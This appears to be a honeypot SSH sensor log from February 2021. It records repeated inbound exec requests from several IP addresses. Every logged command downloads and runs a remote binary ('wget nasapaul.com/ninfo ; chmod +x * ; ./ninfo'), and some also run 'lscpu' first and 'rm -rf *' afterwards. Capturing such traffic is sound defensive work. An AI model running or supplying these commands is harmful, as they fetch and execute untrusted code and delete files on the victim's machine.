01:20:09.082 services ▶ DEBU 6ffb Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000dec60 {{0 0} [0xc0009c0a80] 0} 0xc000efac60 {0 0} 0xc000efad20 0xc000efade0 0xc000033680 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efaea0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efae40) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000483600 {0 0 0 <nil> <nil>} 824633931568}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000033740 0xc0011ffdc0 0xc0011ffdc0 false}) %!s(*ssh.buffer=&{0xc000033780 0xc0011ffe00 0xc0011ffe00 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 01:20:09.082395995 +0000 UTC m=+1478197.363791790, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=45116, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhri0k9kn000dnaogg, token=c0a8v4ok9kn000dn77n0, type=ssh-request
01:20:13.461 services ▶ DEBU 7004 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc000e52580 {{0 0} [0xc0009c0d80] 0} 0xc00654ba40 {0 0} 0xc00654baa0 0xc00654bb00 0xc000e9cb80 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efb620) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efb5c0) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc006614458 {0 0 0 <nil> <nil>} 824633932592}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000033b40 0xc00657c520 0xc00657c520 false}) %!s(*ssh.buffer=&{0xc000033b80 0xc00657c560 0xc00657c560 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 01:20:13.461984395 +0000 UTC m=+1478201.743380174, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=60602, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhrj0k9kn000dnaohg, token=c0a8v4ok9kn000dn77n0, type=ssh-request
01:20:38.877 services ▶ DEBU 7009 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc0065e4000] 0} 0xc0011d66c0 {0 0} 0xc0011d6840 0xc0011d69c0 0xc000032180 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efa600) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efa4e0) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0066146e0 {0 0 0 <nil> <nil>} 824649040368}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9c200 0xc000a99520 0xc000a99520 false}) %!s(*ssh.buffer=&{0xc000e9c240 0xc00118b860 0xc00118b860 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 01:20:38.878458257 +0000 UTC m=+1478227.159854068, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=51840, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhrpgk9kn000dnaoi0, token=c0a8v4ok9kn000dn77n0, type=ssh-request
01:20:47.576 services ▶ DEBU 7012 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc000c02160 {{0 0} [0xc0000ba240] 0} 0xc000efade0 {0 0} 0xc000efae40 0xc000efaea0 0xc000e9c440 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d7020) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d6fc0) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc001149070 {0 0 0 <nil> <nil>} 824633927664}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032800 0xc00013a4a0 0xc00013a4a0 false}) %!s(*ssh.buffer=&{0xc000032840 0xc0001504c0 0xc0001504c0 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 01:20:47.57702981 +0000 UTC m=+1478235.858425678, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=60390, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhrrgk9kn000dnaoj0, token=c0a8v4ok9kn000dn77n0, type=ssh-request
01:21:17.425 services ▶ DEBU 701b Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc000c02420 {{0 0} [0xc0000ba540] 0} 0xc000efb260 {0 0} 0xc000efb2c0 0xc000efb380 0xc000e9c600 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d7800) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d77a0) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc001149b60 {0 0 0 <nil> <nil>} 824633929072}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032d80 0xc0011fe600 0xc0011fe600 false}) %!s(*ssh.buffer=&{0xc000032dc0 0xc0011fe640 0xc0011fe640 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 01:21:17.426345812 +0000 UTC m=+1478265.707741607, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=36570, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhs30k9kn000dnaok0, token=c0a8v4ok9kn000dn77n0, type=ssh-request
01:21:21.571 services ▶ DEBU 7024 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc000c026e0 {{0 0} [0xc0065e4780] 0} 0xc0011d7f20 {0 0} 0xc0011d7f80 0xc00006a1e0 0xc000033180 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efb680) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efb620) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0004322e8 {0 0 0 <nil> <nil>} 824649042416}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9ca00 0xc000e98bc0 0xc000e98bc0 false}) %!s(*ssh.buffer=&{0xc000e9ca40 0xc000e98c20 0xc000e98c20 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 01:21:21.572265481 +0000 UTC m=+1478269.853661273, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=51932, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhs40k9kn000dnaol0, token=c0a8v4ok9kn000dn77n0, type=ssh-request
03:21:26.145 services ▶ DEBU 71b0 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc000a58000] 0} 0xc000e95440 {0 0} 0xc000e955c0 0xc000e956e0 0xc000032580 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d65a0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d6540) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000432730 {0 0 0 <nil> <nil>} 824649040304}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9c1c0 0xc0011fe160 0xc0011fe160 false}) %!s(*ssh.buffer=&{0xc000e9c200 0xc0011fe1a0 0xc0011fe1a0 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 03:21:26.145657772 +0000 UTC m=+1485474.427053559, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=178.62.231.95, source-port=46912, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0ljkd8k9kn000dnaq70, token=c0a8v4ok9kn000dn77n0, type=ssh-request
03:25:25.338 services ▶ DEBU 7219 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de580 {{0 0} [0xc00082e300] 0} 0xc000e95f20 {0 0} 0xc000efa000 0xc000efa0c0 0xc000e9c4c0 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d6540) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d6480) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000e919f0 {0 0 0 <nil> <nil>} 824633927280}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032680 0xc000e98b20 0xc000e98b20 false}) %!s(*ssh.buffer=&{0xc0000326c0 0xc000e98b60 0xc000e98b60 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 03:25:25.338714627 +0000 UTC m=+1485713.620110430, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=178.62.231.95, source-port=45366, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0ljm90k9kn000dnaqk0, token=c0a8v4ok9kn000dn77n0, type=ssh-request
05:05:34.106 services ▶ DEBU 7278 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc0000ba240] 0} 0xc000efa240 {0 0} 0xc000efa2a0 0xc000efa360 0xc000032300 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d6b40) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d6a20) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000432368 {0 0 0 <nil> <nil>} 824649040304}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9c1c0 0xc00118bac0 0xc00118bac0 false}) %!s(*ssh.buffer=&{0xc000e9c200 0xc00118bb00 0xc00118bb00 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) Alscpu ; wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo ; rm -rf *
services > ssh > category=ssh, date=2021-02-16 05:05:34.107143848 +0000 UTC m=+1491722.388539632, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=52.152.130.178, source-port=34908, ssh.exec=[]string{"lscpu ; wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo ; rm -rf *"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x41, 0x6c, 0x73, 0x63, 0x70, 0x75, 0x20, 0x3b, 0x20, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x72, 0x6d, 0x20, 0x2d, 0x72, 0x66, 0x20, 0x2a}, ssh.request-type=exec, ssh.sessionid=c0ll578k9kn000dnar00, token=c0a8v4ok9kn000dn77n0, type=ssh-request
05:13:25.955 services ▶ DEBU 72b1 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc0000ba240] 0} 0xc000efa000 {0 0} 0xc000efa0c0 0xc000efa180 0xc000e9c000 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d6c60) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d6ba0) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0000391d0 {0 0 0 <nil> <nil>} 824633927152}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032600 0xc000e98580 0xc000e98580 false}) %!s(*ssh.buffer=&{0xc000032640 0xc000e985c0 0xc000e985c0 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) Alscpu ; wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo ; rm -rf *
services > ssh > category=ssh, date=2021-02-16 05:13:25.956122125 +0000 UTC m=+1492194.237517907, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=52.152.130.178, source-port=34144, ssh.exec=[]string{"lscpu ; wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo ; rm -rf *"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x41, 0x6c, 0x73, 0x63, 0x70, 0x75, 0x20, 0x3b, 0x20, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x72, 0x6d, 0x20, 0x2d, 0x72, 0x66, 0x20, 0x2a}, ssh.request-type=exec, ssh.sessionid=c0ll8t8k9kn000dnar70, token=c0a8v4ok9kn000dn77n0, type=ssh-request
05:26:25.548 services ▶ DEBU 72ec Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc000e1e000] 0} 0xc000efa600 {0 0} 0xc000efa660 0xc000efa6c0 0xc000e9c0c0 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d66c0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d6660) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000482c40 {0 0 0 <nil> <nil>} 824633927280}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032680 0xc0011fe320 0xc0011fe320 false}) %!s(*ssh.buffer=&{0xc0000326c0 0xc0011fe360 0xc0011fe360 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 05:26:25.548971359 +0000 UTC m=+1492973.830367175, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=64.225.101.223, source-port=58506, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0llf00k9kn000dnareg, token=c0a8v4ok9kn000dn77n0, type=ssh-request
05:30:50.956 services ▶ DEBU 734d Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000deb00 {{0 0} [0xc0000bacc0] 0} 0xc0011d72c0 {0 0} 0xc0011d7320 0xc0011d73e0 0xc000032c00 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d74a0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d7440) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000483070 {0 0 0 <nil> <nil>} 824633928880}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032cc0 0xc0011ffb20 0xc0011ffb20 false}) %!s(*ssh.buffer=&{0xc000032d00 0xc0011ffb60 0xc0011ffb60 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 05:30:50.957196197 +0000 UTC m=+1493239.238591988, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=64.225.101.223, source-port=38832, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0llh2gk9kn000dnarqg, token=c0a8v4ok9kn000dn77n0, type=ssh-request
06:48:38.110 services ▶ DEBU 7399 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc0000ba240] 0} 0xc000e952c0 {0 0} 0xc000e95440 0xc000e955c0 0xc000032640 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d66c0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d6660) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0004829c0 {0 0 0 <nil> <nil>} 824649040240}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9c180 0xc000e984e0 0xc000e984e0 false}) %!s(*ssh.buffer=&{0xc000e9c1c0 0xc000e98520 0xc000e98520 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 06:48:38.111267801 +0000 UTC m=+1497906.392663578, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=167.172.24.118, source-port=55164, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lmlh8k9kn000dnas30, token=c0a8v4ok9kn000dn77n0, type=ssh-request
19:35:35.324 services ▶ DEBU 77d9 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc0000ba240] 0} 0xc0011d6540 {0 0} 0xc0011d65a0 0xc0011d6600 0xc000032100 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efafc0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efaf60) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000432a18 {0 0 0 <nil> <nil>} 824649040496}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9c280 0xc000e985c0 0xc000e985c0 false}) %!s(*ssh.buffer=&{0xc000e9c2c0 0xc000e98600 0xc000e98600 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 19:35:35.32485359 +0000 UTC m=+1543923.606249369, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.124.29, source-port=44330, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0m1t1gk9kn000dnb0d0, token=c0a8v4ok9kn000dn77n0, type=ssh-request
